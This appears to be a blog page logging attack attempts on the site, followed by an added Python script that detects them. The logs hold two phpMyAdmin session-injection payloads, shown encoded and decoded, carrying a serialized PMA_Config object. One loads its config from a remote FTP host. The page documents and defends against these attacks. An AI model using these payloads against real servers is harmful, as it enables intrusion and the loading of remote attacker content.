Welcome to Exploit KB Wall of Shame!
This section will contain details about various attack attempts on this blog.
95.168.191.160
This address 95.168.191.160 is starring in my logs trying to access the blog login page.
I see POST requests containing the following data: “%C2%EE%E9%
The strange thing is that the data of the POST request is the same.
203.197.151.38
Attacking IP: 203.197.151.38
Request URI:
/phpmyadmin/index.php?session_to_unset=123&token=d42abd21e630a17c8d19427a106d3a3d&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a71%3a%22ftp%3a%2f%2f670473%3a123456%4081s0fucr65.host-ed.net%2f81s0fucr65.host-ed.net%2ft.txt%22%3b%7d%7d
Decoded Payload:
_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:71:"ftp://670473:123456@81s0fucr65.host-ed.net/81s0fucr65.host-ed.net/t.txt";}}
111.94.106.159
Attacking IP: 111.94.106.159
Request URI:
/phpmyadmin/index.php?session_to_unset=123&token=d42abd21e630a17c8d19427a106d3a3d&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a42%3a%22%2ftmp%2fsess_n931qdag21g0vtvmfdg4k996jh8svu97%22%3b%7d%7d
Decoded Payload:
_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:42:"/tmp/sess_n931qdag21g0vtvmfdg4k996jh8svu97";}}
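Detection sketch for the two phpMyAdmin requests above. This is an added example, not code from this blog: it URL-decodes each query parameter and flags a PHP superglobal name used as a parameter, a serialized PHP object in the value, and the "source" property it carries. The function name and finding labels are assumptions chosen for illustration; the first two sample URIs are the ones logged above and the third is a constructed benign request.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP serialized object header: O:<name length>:"<ClassName>":<property count>:{
PHP_OBJECT = re.compile(r'O:\d+:"([A-Za-z_][A-Za-z0-9_]*)":\d+:\{')
# Serialized string property named "source": s:6:"source";s:<len>:"<value>";
SOURCE_PROP = re.compile(r's:\d+:"source";s:\d+:"(.*?)";')
# PHP superglobals that should never appear as request parameter names
SUPERGLOBALS = ("_SESSION", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS")

def inspect_uri(uri):
    """Return a list of (label, detail) findings; an empty list means clean."""
    findings = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        # "_SESSION[!bla]" -> "_SESSION": the request tries to write a superglobal
        if name.split("[", 1)[0] in SUPERGLOBALS:
            findings.append(("superglobal_param", name))
        # Any serialized object in a parameter value is suspicious on its own
        for cls in PHP_OBJECT.findall(value):
            findings.append(("serialized_object", cls))
        # Triage: is the injected config source a remote URL or a local file?
        for src in SOURCE_PROP.findall(value):
            kind = "source_remote" if "://" in src else "source_local"
            findings.append((kind, src))
    return findings

SAMPLE_URIS = [
    # Logged above (203.197.151.38)
    "/phpmyadmin/index.php?session_to_unset=123&token=d42abd21e630a17c8d19427a106d3a3d&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a71%3a%22ftp%3a%2f%2f670473%3a123456%4081s0fucr65.host-ed.net%2f81s0fucr65.host-ed.net%2ft.txt%22%3b%7d%7d",
    # Logged above (111.94.106.159)
    "/phpmyadmin/index.php?session_to_unset=123&token=d42abd21e630a17c8d19427a106d3a3d&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a42%3a%22%2ftmp%2fsess_n931qdag21g0vtvmfdg4k996jh8svu97%22%3b%7d%7d",
    # Constructed benign request for comparison
    "/phpmyadmin/index.php?db=test&token=0123456789abcdef",
]

if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        print(inspect_uri(uri) or "clean")
```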